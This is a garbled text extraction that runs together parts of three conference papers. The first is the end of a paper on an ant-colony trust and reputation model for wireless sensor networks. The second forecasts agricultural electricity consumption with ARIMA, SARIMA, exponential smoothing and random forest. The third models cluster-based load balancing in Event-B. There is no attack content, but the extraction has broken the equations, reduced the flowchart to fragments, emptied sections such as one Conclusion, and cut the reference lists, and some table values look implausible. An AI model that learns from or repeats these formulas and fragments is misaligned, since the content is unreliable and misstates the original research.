satisfaction. Based on the satisfaction occurred, the final step, punishing or rewarding,
is carried out. If a server node is unsuccessful in making the client satisfied with
service provider, its reputation score will be affected, and the client is less likely to
have transaction with it again.
BTRM-WSN [18] carries out the selection of the most trustworthy node through the
most reputable path offering a certain service. It is based on bio-inspired algorithm
called ant colony system (ACS), where ants form paths in order to fulfill some condi-
tions graphically. Pheromone traces of ants that help coming ants to discover and
come from those paths. These pheromone values will help ants to discover the optimal
path solutions since the optimal path will have the maximum amount of pheromone
value. When we apply this ACS algorithm on to trust and reputation system, trust-
worthiness of sensors is represented by pheromone value. In this BTRM-WSN, each
sensor node holds contains pheromone traces for its neighbors (τ ∈ [0, 1]), which
find out possibility for an ant to select a path as well as the sensor the path leading
to as a solution. In other words, τ can be considered as the trust that a sensor gives
another. The steps of algorithm of BTRM are as follows:
A set of imitation ants are developed, and then, they leave the client sensor. When
an ant proceeds from a node i to node j, it gives an instruction for these two sensor
nodes to improve the pheromone value of the path between them through Eqs. (1)
and (2),
τi j = (1 − ϕ). τi j + ϕ. (1)
= 1 + (1 − ϕ). 1 − τi j . ηi j (2)
τi j is the pheromone value of the path between sensor i and sensor j, is the
convergence value of τi j and ϕ is a parameter controlling the amount of pheromone
left by the ants.
When ant moving in a network searching for the most trustworthy path to the
server providing good service, each ant must decide whether to stop and return the
solution to the client or continue to discover another one, based on the reputability
of the server that is discovered. When ant k reaches at sensors, server situations
may occur. The first is that sensor s has more neighbors not visited by ant k; then,
k estimates average pheromone value (τk ) of the path come next by ant k from the
572 V. Arya et al.
client until the sensor s. If τk is greater than described transition threshold TraTh
(transition threshold), then ant k stops and returns the solution or vice versa. Another
situation is that s does not provide any services. If sensor s has more neighbors not
visited by ant k, then k decides the next node to move. If sensor s has visited all the
neighbors, then ant k reaches a dead end. It has to go back to the route that it has
form until it reaches at sensor offering the requested service, a sensor not offering
the requested service but having more neighbors not visited yet [19].
Client will test and determine the quality of the solution brought back by each
launched ant. The quality of path could be computed by Eq. (3),
τk
Q (Sk ) = .%Ak (3)
Length(Sk )PLF.
τi j is the pheromone value of the path between sensor i and sensor j; is the
convergence value of τi j and ϕ is an amount of pheromone traces left by ants. Sk
designates the solution brought back by ant k. Q(Sk ) defines the quality of path Sk ; τk
designates the average path pheromone of path Sk found by ant k; PLF ∈ [0, 1] define
a path length factor and % Ak denote the percentage of ants that have selected the same
solution as ant k. After estimating the path quality of all solution brought back by ants,
the client selects the path with maximum score and collect it as Current_Best solution.
Then, the client compares the route quality with the best solution (Global_Best) found
by earlier transactions. If Current_Best solution is even better, then the client will
take the place of the previous Global_Best with the Current_Best solution. Then, an
extra ant is sent to improve the pheromone value of the current Global_Best.
After the client selects the Global_Best solution, it will have transaction with the
selected sensor. It with the default service which the client expects to obtain, after
receiving the service. There might be two conditions: first, the selected server sensor
might be completely trustworthy and provide the accurate service as it is assumed to
or it could be totally malicious and provide highly difference service. In the earlier
condition, the client is convinced and will give a satisfaction value (Sat) is find out as
an irregular number between PunTh and 1; while in the last condition, the satisfaction
value (Sat) is found out as an irregular number between 0 and PunTh as the client is
considered as unsatisfiable. PunTh is predefined punishment threshold value.
Enhanced Bio-inspired Trust and Reputation Model … 573
A client will demand the desired service to what it objects to be the most reputable
server through the most trustworthy path. Then, punish or reward will be given to
all connection in this path based on whether the client is satisfied with the service
provided by the server. This is done by increasing or decreasing the pheromone value
of the path [20–23].
This section introduced an enhanced bio-inspired trust and reputation system inspired
by BTRM tested in prior section. In EBTRM algorithm, we modify the parameters
values of bio-inspired algorithm. Flow chart and improvements in BTRM algorithm
(EBTRM) are as shown in Fig. 1.
τk
Q (Sk ) = .%Ak
Length (Sk )
where PLF = 1, we have selected those paths, which are as short as possible. In
second modification, we enhance the radio range and take the radio range maximum
because maximum radio range provides security. Suppose, two nodes communicate
with each other, if radio range is maximum then they can directly communicate but
its range is minimum then they cannot communicate directly with each other and
possibility of interference of malicious node is increased. The last modification is
in the value of qo (= 0.6335), and the possibility of choosing deterministically the
most trustworthy next node is increased which increases the accuracy of the system.
574 V. Arya et al.
START
Q(Sk) > NO
Q(Current Best ) Wait for Timeout
Expire
Yes
Yes
End
Pheromone
Global Updating
End
5 Simulation Results
In our proposed work, we consider ten networks composed of 10–100 sensor nodes,
each for 10 executions in two-dimensional areas. Sensor nodes in a cluster with
particular radio range transmit the data to the cluster head and then to the base
station within the entire network. In collusion network, every malicious node will give
the maximum rating for every other malicious node and minimum rating for every
benevolent one. We used Java based event driven TRMSim—WSN [24] simulator
version 0.5 for WSNs allowing the researchers to simulate and represent random
network distributions and provide statistics of different data dissemination policies
including the provision to test the different strategies of trust and reputation models.
Many networks like collusion, oscillating and dynamic networks, the percentage
of nodes, malicious nodes and so forth, can be implemented and tested over it. In
our experiment, we concentrated on collusion network and enhance the accuracy of
Enhanced Bio-inspired Trust and Reputation Model … 575
Table 1 Parameters of
Parameters BTRM values EBTRM values
BTRM and EBTRM
Phi 0.01 0.01
Rho 0.87 0.87
q0 0.45 0.6335
Num ants 0.35 0.35
Num iterations 0.59 0.59
Alpha 1.0 1.0
Beta 1.0 1.0
Initial pheromone 0.85 0.85
Punishment threshold 0.48 0.48
Path length factor 0.71 1
Transition threshold 0.66 0.66
Radio range 12 m 50 m
In our work, we have used the concept of accuracy to evaluate the reliability and
level of security provided by the trust and reputation system is represented by the
percentage that the number of times when it is successfully selected trustworthy
sensors out of the total number of transactions. A better trust and reputation should
have a good control of the negative influence in which the malicious nodes have on
the WSN. Figure 2 shows the comparison of accuracy BTRM and EBTRM algorithm
with varying number of malicious nodes.
Path length is the average hops leading to the most trustworthy sensors which are
selected by the client in a WSN applying certain type of trust and reputation system.
It is assumed that less average path indicates a better performance in efficiency and
576 V. Arya et al.
easiness in searching for trustworthy sensors of a trust and reputation system. Figure 3
represents path length of BTRM and EBTRM algorithm graphically.
Energy consumption of the network is the overall energy consumed in: client nodes
sending request messages, server nodes sending response services, energy consumed
Enhanced Bio-inspired Trust and Reputation Model … 577
by malicious node which provides bad services, relay nodes which do not provide
services, the energy to execute the trustworthy sensor searching process of a certain
trust and reputation system. For WSN, researcher’s major problem is how to effec-
tively reduce energy consumption. Figure 4 shows EBTRM has lowest energy
consumption.
6 Conclusions
Our proposed EBTRM system successfully increases the accuracy in trust and repu-
tation system. Therefore, the level of security of the original BTRM-WSN without
sacrificing its advantages in finding trustworthy sensors efficiently and the extra
amount of energy for those add-ons is acceptable EBTRM is proven to be able
to accurately distinguish benevolent sensor from malicious sensor and thus protect
WSNs from attackers. And most important thing is level of security it provides not
influenced by the number of attackers as much as its two competitors do. When the
network is in a relatively secured status, it becomes more complicated and less energy
efficient to search for trustworthy sensors because of the extra conditioning and
computation overall the modification in BTRM a successful. Our proposed EBTRM
provides better solution to WSNs, where a high level of security is required while
future work will keep on developing the algorithms searching for trustworthy sensors
to improve the easiness in finding trustworthy sensors as well as energy efficiency.
EBTRM provides a higher level of security for WSNs without sacrificing the effi-
ciency of the original approach and does not require huge amount of energy for the
extra consumption.
578 V. Arya et al.
References
21. Karthik, S., Vanitha, K., & Radhamani, G. (2011). Trust Management Techniques in Wireless
Sensor Networks: An Evaluation. IEEE.
22. Dorigo, M., Stuzle, T. (2004). Ant Colony optimization. Bradford Book.
23. Ukil, A. Trust and Reputation Based Collaborating Computing in Wireless Sensor Networks.
In Second International Conference on Computational Intelligence, Modelling and Simulation,
24. Marmol, F. et al. (2009). TRMSim-WSN, trust and reputation models simulator for WSNs. In
IEEE Communication Society.
Analytical Machine Learning
for Medium-Term Load Forecasting
Towards Agricultural Sector
Abstract The economic growth of any country depends upon available resources
and their proper management. All the sectors, residential, industrial, commercial or
agricultural require sufficient and reliable energy services. Electricity is one of the
most important forms of energy that cannot be replaced by any other energy input. The
agriculture sector has an important role in the process of foodstuff production. The
non-food product also participates in the economy like tobacco and jute. Electricity
plays important role for irrigation in the agricultural sector. Proper management of
the energy consumption for irrigation is required for the utilization of the existing
resources. So, there is a need for predicting the future consumption of electricity in
the agricultural sector. Medium term load forecasting is used for predicting weeks to
years ahead electricity consumption. In the proposed work, statistical and machine
learning based algorithm are used to predict the one year ahead electricity consump-
tion in the agricultural sector. The time series-based statistical techniques like auto-
regressive integrated moving average (ARIMA), seasonal ARIMA (SARIMA), expo-
nential smoothing (ES) and machine learning based approach like random forest (RF)
are used to forecast medium term load consumption in the agricultural field. The
SARIMA model shows the minimum root mean square percentage error (RMSPE).
The result shows that statistical approach like SARIMA and ES outperforms than
random forest.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 581
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_47
582 M. Sharma et al.
1 Introduction
Electricity load forecasting is required for consumer, utility, distributor, and generator
at each level for accurate prophecy as it plays an imperative role in planning. In the
current scenario, while there was a pandemic and lockdown occurred in all over
India, many consumers facing the issue of a huge amount in the bill. The reason
behind this is the utility predict the bills according consumption of the consumer
from the last 4-months consumption pattern, then average it. To resolve similar
kind of issues a proper forecasting technique is required with high accuracy. Energy
demand forecasting is important, but it is a difficult task in the agricultural field due
to multiple factors on which it depends and their varying nature. In the agriculture
sector, existing work on forecasting energy demand depends on trends and factors
relevant to national averages, although energy demand varies by the variation of
weather, crops, area, farm machinery and technologies, pump set, and ground water.
Concerning enhancement of the yield proper management of irrigation is required.
As pumping irrigation depends on electricity, there is a need to forecast electricity
consumption in the agricultural sector [1].
There has been a rapid growth in electricity consumption in every sector and the
agriculture sector also has a sharp growth. The agriculture sector shares 17.49% of the
total consumption of electricity in the year 2018–19 [2]. There is an annual increment
occurs for electricity consumption in the agriculture sector and it changes according
to the crop seasons. The supplied electricity is subsidized or somewhere it is free and
most of the areas are unmetered. The farmer needs incentives for growing appropriate
crops but due to unmetered they are wrongly blamed for highly power consumption
and they face the problem of poor-quality electricity. Most of the electricity provided
in the agriculture sector is subsidized. If proper forecasting is done in the agriculture
sector then it provides benefits to framers, utility, and government. To truly estimate
the electricity consumption, need to deploy meters in the field. In this paper, both flat
and metered electricity consumption are considered to estimate future consumption.
The sector-wise energy consumption in India is descriptively shown in Fig. 1, as
per the 2011 census, 61.5% population of India is rural and dependent on agriculture,
this sector contributes 14.4% in Indian GDP (as per 2018–19 economy survey) [3].
If the proper forecasting of the electricity consumption is done according to the
season then it creates a profit to framer and to utilize the resources available at the
season.
There are four types of load forecasting exist on the basis of time horizon: Very
small term load forecasting (VSTLF) for predicting minutes to hour ahead load
consumption, small term load forecasting (STLF) for predicting day to week ahead
load consumption, medium term load forecasting (MTLF) for accurately predicting
the load two weeks or three years ahead and long-term load forecasting (LTLF)
Analytical Machine Learning for Medium-Term Load Forecasting … 583
to predict more than three years ahead future load [4]. In this paper, we predict
one year ahead electricity consumption in agricultural sector using different type of
forecasting techniques.
There are so many forecasting techniques exist, they are classified into two parts
[4, 5]:
(a) Statistical approach: The statistical approach is further classified in Time
series analysis and Regression Techniques [6].
(b) Intelligent approach: fuzzy logic, machine learning and deep learning
techniques.
In this paper, we focus on time series analysis, in which the projected consump-
tion depends on its previous historical consumption. Four techniques are applied
on dataset, auto-regressive integrated moving average (ARIMA), seasonal ARIMA
(SARIMA), exponential smoothing (ES) and random forest (RF), among these
SARIMA shows better results.
This paper is organized as follows. Section 2 specifies the work done to fore-
cast electricity consumption based on different indicators. Section 3 provides
details of proposed methodology used for forecasting the pattern of consumption.
Section 4 contains the information regarding result achieved by different forecasting
techniques. Section 5 provides conclusion and future work.
2 Literature Review
In this section, a detailed view of work done for energy consumption forecasting is
given. Energy indicators are used to identifying the trends and key drivers to optimize
584 M. Sharma et al.
energy consumption. Energy indicators are selected and decided by their correlation
coefficient analysis with the qualified output and their accuracy depends on the perfor-
mance. Three types of energy indicators are defining: Social, economic, and envi-
ronment according to “Energy Indicators for Sustainable Development: Guidelines
and Methodology” [7].
In [8], economic indicators are used to forecast electricity consumption in the
agricultural sector. Electricity prediction depends on the population, per capita GDP,
and farming land. The artificial neural network applied to forecast electricity where
input neurons are the economic indicators and the output variable is the AS-EC
(agriculture sector- electricity consumption).
In [9], the IoT based approach proposed that diagnose, monitor, and control the
factors that affect crop yield and optimize the requirement of the irrigation. The author
considered the temperature, humidity, and soil moisture as a parameter that needs
analyses for optimally watering. Sensors are implemented in the field to measure the
soil moisturization, accordingly, the water need of the crop in future is analysis.
In [10], an ARIMA model is used to forecast electricity consumption in an insti-
tution and proposed that the monthly time series gives better results than bi-monthly
and quarterly time series. The dataset is related to the health care institute. Finally,
an equation is given based on the selected model. The model, which has minimum
SSE and MPE error, is selected to forecast electricity consumption.
A season-based model is given in [11], in which a short-term load forecasting
performed using ARIMA, SARIMA and neural network, RNN, and RNN with
average true range (ATR). Comparing the model performance and select the best
model which gives fewer errors according to the energy management system. The
model forecasted for three seasons, May-June, July-September, October-December,
and among the five model RNN with ATR gives better results according to different
seasons, but every season has a different model to forecast future values.
An ARIMA model is used to forecast seven-year electricity consumption in
different sectors. Each sector has a different model of ARIMA (p,d,q) of auto regres-
sion, difference, and moving average. This paper considers domestic, commercial,
and industrial sectors, and the agricultural sector is untouched [12].
In [13], a model proposed for short term load forecasting using random forest and
the multi-layer perceptron and predict the one week ahead electrical load data.
3.1 Dataset
The monthly electricity consumption data is collected from Jaipur Vidyut Vitran
Nigam Limited (JVVNL). In data pre-processing, we select only agricultural flat
and metered energy consumption data. The data are monthly collected from the year
January 2015- April 2020. We train the model from January 2015-December 2019
Analytical Machine Learning for Medium-Term Load Forecasting … 585
Fig. 2 Auto ARIMA model for forecasting electricity consumption where x-axis shows the year
and y-axis represent electricity consumption in Lakh Unit
and test the model form Jan 2020-April 2020 and forecast the electricity consumption
pattern for next year.
3.2 Methodology
ARIMA model is the combination of moving average and auto regressive with inte-
grated differencing. The accurate load forecasting for a time lag or multiple time lag in
the future can be predicted using historical consumption data. Firstly, transform input
data into stationary time series data and then using auto correlation function (ACF)
and partial ACF to get the order of auto regressive (AR), moving average (MA),
seasonal AR (SAR), and seasonal MA (SMA). Moving Average (MA) process of
order q has an ACF that cut off after q lags. Partial ACF (PACF) helps to obtain the
order of an AR(p) process, an auto regressive (AR) process of order p, an AR(p), has
a PACF that cut off after p lags. The aim of transforming into stationary time series
because one part of the time series is equal to the other part of the time series [10].
One year ahead forecasted pattern of electricity consumption is shown in Fig. 2.
Fig. 3 a Monthly electricity consumption, b log transformation of time series data, c difference of
the log transformation to remove trend, d stationary form of data
Step-1: Transforming the time series data into stationary time series using differ-
ence and log transformation and remove the trend and seasonality to make this
stationary. The transformation of the monthly electricity consumption data into
the stationary data given in Fig. 3, Where X-axis shows time and Y- axis shows
electricity consumption (EC) in agricultural sector.
Step-2 ACF and PACF at different time lags able to decide degree of moving
average and auto regressive. The degree of MA is determine using ACF which is
1 and there is seasonal component after lag 12 so the degree of Q is 5. The degree
of p is 0 or 1 and the degree of P is 1 decided by the PACF.
Step-3 Model Selection: The best model among (0,0,0,0,0,0) to (1,1,1,1,1,5) on
the base of AIC and SSE value. The model ARIMA (1,1,1,0,1,2) gives minimum
AIC value and less SSE. Then, fit the model to forecast future values.
Step-4 Ljung-Box test, for residuals, shows there is no correlation among the
residuals.
Step-5 Fit model in the time-series: among the best model which has less AIC
and SSE value is selected for forecasting the electricity consumption. The pattern
of forecasted electricity consumption shown in Fig. 4 by SARIMA model.
Fig. 5 Actual v/s forecasted graph of electricity consumption, where the black line represents
actual value and the red line shows the predicted value
One of the most important usages of machine learning [15] is we can utilize machine
learning algorithms like random forest (RF) to identify the important features. In
time series, data important features are the time lag. RF creates a new time series
with 12 months of lag values to predict the current observation. RF is used to identify
which of these set of values most important for predicting the current values.
The value from two time period ago t-2 is most important, followed by value at
present time t as given in Fig. 6. The most important time lag observations which
predict the current value of the response variable are t, t-10, t-9, t-2.
588 M. Sharma et al.
The forecasted value of electricity consumption using ARIMA (0,1,9) model is repre-
sented in Fig. 7. Parameters like moving average related to ARIMA model are given
in Table 1.
Fig. 7 Actual and forecasted electricity consumption using auto ARIMA model
Table 1 Parameter
Coefficient Value Standard error
estimation using
ARIMA(0,1,9) model ma1 −0.5485 0.1359
ma2 −0.2382 0.1391
ma3 −0.5343 0.1510
ma4 0.5229 0.1515
ma5 0.0366 0.1489
Analytical Machine Learning for Medium-Term Load Forecasting … 589
The electricity consumption effected by the months/ seasons. The coefficient and
standard error of model SARIMA (1,1,1) (0,1,2) are shown in Table 2. Two year
ahead forecasted electricity consumption pattern is given in Fig. 8 where blue line
represents forecasted consumption and black line represents the actual electricity
consumption.
Two year ahead electricity consumption pattern is represented in Fig. 9, where blue
line denotes the forecasted consumption and black line represents actual consump-
tion. The smoothing parameter shows that there is no effect of trend and there is
much effect of seasonality. The coefficient of 12 months is shown in Table 3.
In random forest, the most important time lag observations which predict the current
value of the response variable are t, t-10, t-9, t-2. The electricity consumption pattern
is shown in Fig. 10 using random forest, where red line denotes predicted electricity
consumption and blue line represents actual electricity consumption.
Table 4 Forecasted electricity consumption from Jan-20 to April-20 using different models
Month Actual ARIMA SARIMA Holt-Winters (ES) Random Forest (RF)
Jan-20 30,245.96 28,266.80 34,850.36 32,506.71 31,198.37
Feb-20 40,777.96 31,655.47 38,691.08 36,581.14 34,794.27
Mar-20 45,793.18 28,248.96 42,704.76 40,196.50 28,699.55
Apr-20 4860.68 17,126.34 4665.74 4381.53 8737.55
Analytical Machine Learning for Medium-Term Load Forecasting … 591
Electricity demand forecasting is the crucial aspect for every sector planning and
monitoring the electricity consumption by the utility, and if proper utilization of the
available resource is done, it gives benefits to government, consumer, and utility.
Agriculture is one of the sectors which depends on electricity and there is a need
to forecast the demand for their requirement according to the season/ monsoon. In
the proposed work, a time series-based mid-term load forecasting is performed to
determine the month-wise electricity consumption pattern in the agricultural sector.
The dataset contains historical electricity consumption data of agricultural sector
and different type of statistical and machine learning techniques are used to train
the dataset to predict one year ahead electricity consumption in agricultural sector.
ARIMA, seasonal ARIMA, exponential smoothing, and random forest techniques
are used to forecast future electricity consumption pattern. The result shows that
SARIMA outperforms among the four models as it shows less error in terms of
RMSE and RMSPE.
To forecast electricity consumption accurately in the agriculture sector, historical
data is not sufficient, but there is an effect of weather, level of groundwater as well
as the type of crops. Thus, in future, regression techniques or intelligent algorithms
can be used for forecasting electricity consumption in the agricultural field.
Acknowledgements The work was supported by Genus Power Infrastructures limited and author
would like to thank the FICCI and SERB which provide funds under the Prime Minister’s Fellowship
for Doctoral Research (PMRF). The author is also grateful to Jaipur Vidyut Vitran Nigam Limited
(JVVNL) for their support and providing the original dataset.
592 M. Sharma et al.
References
1. Moulik, T. K., Dholakia, B. H., & Shukla, P. R. (1990). Energy demand forecast for agriculture
in India. Economic and Political Weekly, A165-A176.
2. http://www.mospi.gov.in/sites/default/files/publication_reports/ES_2020_240420m.pdf
3. http://www.cea.nic.in/reports/others/planning/pdm/growth_2019pdf
4. Eskandarnia, E. M., Kareem, S. A., & Al-Ammal, H. M. (2018). A review of smart meter load
forecasting techniques: Scale and horizon. In IEEE conference April.
5. Cai, M., Pipattanasomporn, M., & Rahman, S. (2019). Day-ahead building-level load forecasts
using deep learning vs. traditional time-series techniques. Applied Energy, 236, 1078–1088.
6. Aprillia, H., Yang, H. T., & Huang, C. M. (2020). Statistical Load Forecasting Using Optimal
Quantile Regression Random Forest and Risk Assessment Index. IEEE Transactions on Smart
Grid.
7. Vera, I., & Langlois, L. (2007). Energy indicators for sustainable development. Energy, 32(6),
875–882.
8. Saravanan, S., & Karunanithi, K. (2018). Forecasting of electric energy consumption in Agri-
culture sector of India using ANN Technique. International Journal of Pure and Applied
Mathematics, 119(10), 261–271.
9. Muangprathub, J., Boonnam, N., Kajornkasirat, S., Lekbangpong, N., Wanichsombat, A., &
Nillaor, P. (2019). IoT and agriculture data analysis for smart farm. Computers and Electronics
in Agriculture, 156, 467–474.
10. Kaur, H., & Ahuja, S. (2017). Time series analysis and prediction of electricity consumption of
health care institution using ARIMA model. In Proceedings of Sixth International Conference
on Soft Computing for Problem Solving, pp. 347–358. Springer, Singapore.
11. Panapongpakorn, T., & Banjerdpongchai, D. (2019, January). Short-term load forecast for
energy management systems using time series analysis and neural network method with average
true range. In 2019 First International Symposium on Instrumentation, Control, Artificial
Intelligence, and Robotics (ICA-SYMP), pp. 86–89. IEEE.
12. Katara, S., Faisal, A., & Engmann, G. M. (2014). A time series analysis of electricity demand
in Tamale, Ghana. International Journal of Statistics and Applications, 4(6), 269–275.
13. Moon, J., Kim, Y., Son, M., & Hwang, E. (2018). Hybrid short-term load forecasting scheme
using random forest and multilayer perceptron. Energies, 11(12), 3283.
14. Gardner, E. S., Jr. (2006). Exponential smoothing: The state of the art—Part II. International
Journal of Forecasting, 22(4), 637–666.
15. Moon, J., Kim, J., Kang, P., & Hwang, E. (2020). Solving the cold-start problem in short-term
load forecasting using tree-based methods. Energies, 13(4), 886.
Formal Modelling
of Cluster-Coordinator-Based Load
Balancing Protocol Using Event-B
1 Introduction
In the hierarchical distributed system method, the network is divided into many
clusters. Each cluster has set of sites. Due to uneven distribution of the load, sites
may be underloaded or overloaded. In each cluster, there is one coordinator where
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 593
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_48
594 S. Shukla et al.
all information of every site is stored which helps to take decision in the cluster. The
coordinator maintains a vector stamp to store load information of every site. If any
site transfers load to other site in same cluster, then the corresponding load value
will be changed. The coordinator site also decides to transfer load to other clusters
because of not fulfilling the load transfer request within the cluster. The site contains
the load information, and it will be processed according to the request of the users
[1, 2]. If any site is overloaded, coordinator checks the presence of underloaded site
in its vector table. If it finds, then load transfer will take place in same cluster and
vector value will be updated. If none of the sites are available for granting the load
because of threshold, then the coordinator will send the load to the coordinator of
another cluster [3–5].
In this paper, formal modelling [6] and verification of load transfer are done using
Event-B. Event-B is a formal method which suits to specify properties of distributed
system. We formalize each step of modelling with the help of functions, relations
and other mathematical objects used in discrete mathematics. The Event-B model is
represented by machine and context. The context of model shows static part having
declaration of sets, constants and axioms, and machine represents that dynamic part
contains variables, invariants, theorem and events [7–9].
The remainder of this paper is organized as follows: Section 2 briefly outlines the
Event-B, Sect. 3 describes the cluster-coordinator load balancing protocol, and Sect. 4
presents the formal development of load balancing protocol. Section 5 concludes the
paper.
2 Event-B
Event-B [10–13] is a formal method for modelling and verification of the system.
Formal methods are mathematical techniques to specify system behaviour. It is used
to formalize and verify functions of the system. Event-B uses the notations of discrete
mathematics logic to specify properties and functionalities of system. Event-B model
is represented in terms of variables, invariants, axioms and set of events. Invariants
represent properties of system which should never be changed during execution.
Event-B model produces proof obligations which should be discharged in order to
verify correctness of system. Events in B model represent system behaviour through
its guards and list of actions [14, 15].
utilizes all site information. The vector load of the cluster will help to know the load
status of each site. When load value of any site is more than threshold value, it is
known as overloaded site. Either the load of this overloaded site may be adjusted in
same cluster (when sites are available in same cluster to take extra load) or it will
be transferred to different clusters (due to unavailability of adjusting sites in same
cluster and transferring extra load may cause to overload them).
In our system model, SITE and CLUSTER are declared as carrier set representing set
of sites and clusters, respectively. In the static part of model, we declare clusterstatus
as enumerated set having values underloaded, overloaded. The set loadtrsstatus is
also an enumerated set having values disable or enable. The discussion of variables
and invariants (see Fig. 1) is as follows:
(a) The variable clustergroup is defined as power set of the site.
(b) The variable clustersitestatus specifies that status of the cluster is either
underloaded or overloaded.
(c) The variable loadval represents that the load value of every site will be a natural
number.
(d) Any site can work as coordinator. The variable coordinator is subset of SITE
set.
(e) Variable vlsc shows the vector load stamp of coordinator. Whenever load value
of any site is increased or decreased, the vector load stamp of coordinator in
the cluster will be updated with the latest load value of the site. It is modelled
as:
vlsc ∈ S I T E → (S I T E → N)
The vector vlsc (Si) (Sj) represents the load value of site Sj known to coordinator
Si.
(f) The variable clustercoordinator shows the total function from clustergroup to
SITE. It specifies coordinator site of each cluster. The mapping of the form cc
mss: clustercoordinator specifies that site ss is coordinator of cluster cc.
(g) The variable loadstatus specifies load transfer status of site. If site is ready to
transfer the load or receiving the load, its status will be enabled, otherwise it
will be disabled.
Description of Events:
(A) Creating Group of Clusters: This event models creation of cluster which
contains set of sites (see Fig. 2). The guard grd1 shows that cc is group of
SITE. This group is not present in existing cluster group as ensured by guard
grd2. This event adds cluster cc to cluster group.
(B) Deciding Coordinator in Cluster: This event specifies the selection of coor-
dinator in each cluster (see Fig. 3). In this event, we choose the coordinator
and ensure that every cluster must have one coordinator. Site ss is in cluster
cc (grd3), and it has not been chosen as coordinator yet is specified as grd4.
Due to the occurrence of this event, site ss is selected as coordinator of cluster
group cc (act1).
(C) Load Submission: When any new site is joined in the cluster, we check the
load value. Load value is a natural number that is either greater than or less
than the threshold. Every site in the cluster maintains a load value, and the
coordinator site also maintains a vector load stamp. Load submission event is
shown in Fig. 4. Load ld is a natural number which is defined by guard (grd5).
The guard grd3 ensures that site ss is coordinator of cluster cc. The guards
grd6 and grd7 specify that site ss1 is from cluster cc. The load value of site ss1
is increased by load ld as shown in act1. The vector load stamp of coordinator
ss will be updated as increased load value of site ss1 (act2).
(D) Checking Load Status of Site: This event specifies the status of site as under-
loaded or overloaded (Fig. 5). If load value of site is less than threshold, we
consider that site as underloaded, and if the load is greater than threshold then
it is known as overloaded. In Fig. 5, we check the load status, and site ss1 is
SITE and belongs to the domain of load value (grd1 and grd2). If the load
value of ss1 is less than the threshold (grd3) of Fig. 5a, then status of clustersite
ss1 is underloaded (act1). If the load value of ss1 is greater than the threshold
(grd3) of Fig. 5b, then the clustersite status of ss1 is overloaded (act1).
(E) Sending Load to Coordinator Site: In this event, if any site is overloaded, load
will be sent to coordinator site and load vector value vlsc will be updated
(Fig. 6). The load value of ss1 is greater than the threshold, and the load status
of ss1 is enabled for sending the load as ensured by guards grd10 and grd11,
respectively. In the action, we ensure that site ss accepts load by enabling the
load status. Load value of ss1 is decreased by load ld (act2). The load vector
of coordinator site ss will be updated as load value of site ss1.
(F) Receiving Load From Overloaded Site: This event models transferring of load
to coordinator site (Fig. 7). Load ld is the load value of site ss1, and it is greater
than threshold as ensured by the guard (grd8 and 9). The load status of site ss
598 S. Shukla et al.
is enabled (grd10). If all the guards are true, then actions would be performed.
Load value ld is added to site ss (act1), and vector load stamp of coordinator
will be updated as increased value of load ld (act2).
(G) Transferring load Within Cluster: After receiving the load from the overloaded
site, the coordinator site searches the underloaded site which can take load and
balance all the sites in the cluster (Fig. 8). The guards gr4 and grd5 ensure
that coordinator site ss is overloaded. The guards grd9 and grd10 specify that
underloaded site s is present in cluster cc. Due to the occurrence of this event,
load ld is decreased from site ss (act1) and vector load stamp of coordinator site
ss is updated with decreased value of load ld (act2). The action act3 specifies
that transfer load value of site ss is set to as ld.
(H) Receiving of Load by Underloaded Site: This event models the receiving of
load from coordinator site (Fig. 9). During receiving of load, it should be
ensured that load value of underloaded site should not be greater than the
threshold value. The guards grd7 and grd8 specify that status of site s and ss
is underloaded and overloaded, respectively. Site ss is the coordinator site of
cluster cc (grd9). The guard grd11 specifies that after receiving load ld from
coordinator site ss, load value of site s is less than threshold value. Due to
the occurrence of this event, load value of site s is increased by ld (act1) and
Formal Modelling of Cluster-Coordinator-Based Load … 599
value of coordinator ss2 will also be updated as increased load value of ss2
(act2).
5 Conclusion
Acknowledgements This work is done under the Distributed Load Balancing and System Recovery
(DLSR) project governed by Uttar Pradesh Council of Science and Technology and supported by
PSIT College Kanpur.
Formal Modelling of Cluster-Coordinator-Based Load … 603
References
1. Singhal, M., & Shivratri, N. G. (2005). Advanced Concepts in Operating Systems. India: Tata
Mc- GrawHill Book Company.
2. Alakeel, A. M. (2010). A guide to dynamic load balancing in distributed computer system.
International Journal of Computer Science and Network Security, 10(6).
3. Benmohammed Mahieddine, K. (1991). An evaluation of load balancing algorithm for
distributed systems. School of Computer Science.
4. Yank, J., Ling, L., & Li, H, A hieratical load balancing strategy considering communi-
cation delay overhead for large distributed computing systems. Mathematical Problems in
Engineering, 16 article id: 5641831.
5. Alakeel, A. M. (2016). Application of fuzzy logic in load balancing of homogeneous distributed
system. International Journal of Computer Science & Security (IJCSS), 10(3).
6. Elsayed, E., El Sharawy, G. & El- Sharawy, E. (2013) Integration of automatic provers in
event-B patterns. International Journal of Software engineering & Application (IJSEA), 4(1).
7. Wen Su, Jean Raymond Abrial, Huibiao Zhu “ Formalizing Hybrid system with Event-B and
Rodin platform” Science of computer programming, pp 164–203, April 2014.
8. Abrial, J. R. (1996). The B Book: Assigning programs to meaning. New York, NY, USA:
Cambridge University Press.
9. Sheng Rong Zou, Li Chen, “Comparison of Event-B and B Method: Application in Immune
System” Yangzhou University College of Information Engineering, Jiangsu, China, June 2018.
10. Abrial, J.-R. (2010). Modelling in Event-B: System and Software Engineering (1st ed.). New
York, NY, USA: Cambridge University Press.
11. Rodin Project, RODIN – Rigorous Open Development Environment for Complex Systems,
2004–2007. <http://rodin.cs.ncl.ac.uk/>.
12. Butler, M.: An Approach to Design of Distributed Systems with B AMN. In: Proc. 10th Int.
Conf. of Z Users: The Z Formal Specification Notation (ZUM), LNCS1212, pp. 223–241,
(1997).
13. Butler M. and Walden, M.: Distributed System Development in B. In: Proc. of 1st Conf. in B
Method, Nantes, pp. 155–168, (1996).
14. Raghuraj Suryavanshi, Divakar Yadav “Modelling of Distributed Mutual Exclusion System
using the Event-B” Jan Zizka (Eds): CCSIT, SIPP, AISC, PDCTA – 2013 pp. 477–491, 2013.
© CS & IT-CSCP 2013.
15. Hoang, T. S. An Introduction to the event B modelling method. In Industrial Deployment of
System Engineering Methods, Springer, Alexander Romanovsky, Martyn Thomas, pp. 211–236.
